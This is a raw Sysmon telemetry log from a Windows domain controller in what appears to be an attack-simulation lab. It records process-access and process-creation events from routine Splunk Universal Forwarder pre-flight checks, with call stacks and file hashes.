10341000x80000000000000003947Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.564{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003946Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.564{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003945Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.564{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003944Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.564{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003943Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.564{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003942Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.564{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003941Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.564{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003940Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.564{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4328-6000-D400-000000009A01}4764C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003939Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.564{08A6967A-4326-6000-CA00-000000009A01}30843076C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{08A6967A-4328-6000-D400-000000009A01}4764C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+18274|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003938Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.565{08A6967A-4328-6000-D400-000000009A01}4764C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list replication_port --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{08A6967A-4326-6000-CA00-000000009A01}3084C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000003937Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.486{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4328-6000-D300-000000009A01}4744C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003936Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.470{08A6967A-4328-6000-D300-000000009A01}47444704C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+116e675|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+f344c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003935Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.235{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4328-6000-D300-000000009A01}4744C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003934Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.235{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003933Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.235{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003932Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.235{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003931Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.235{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003930Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.235{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003929Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.235{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003928Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.235{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003927Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.235{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003926Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.235{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003925Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.235{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4328-6000-D300-000000009A01}4744C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003924Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.235{08A6967A-4326-6000-CA00-000000009A01}30843076C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{08A6967A-4328-6000-D300-000000009A01}4744C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+18226|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003923Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.240{08A6967A-4328-6000-D300-000000009A01}4744C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd" check-transforms-keysC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{08A6967A-4326-6000-CA00-000000009A01}3084C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000003922Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.173{08A6967A-4327-6000-D200-000000009A01}43884352C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004121Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.942{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4329-6000-E100-000000009A01}4108C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004120Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.942{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 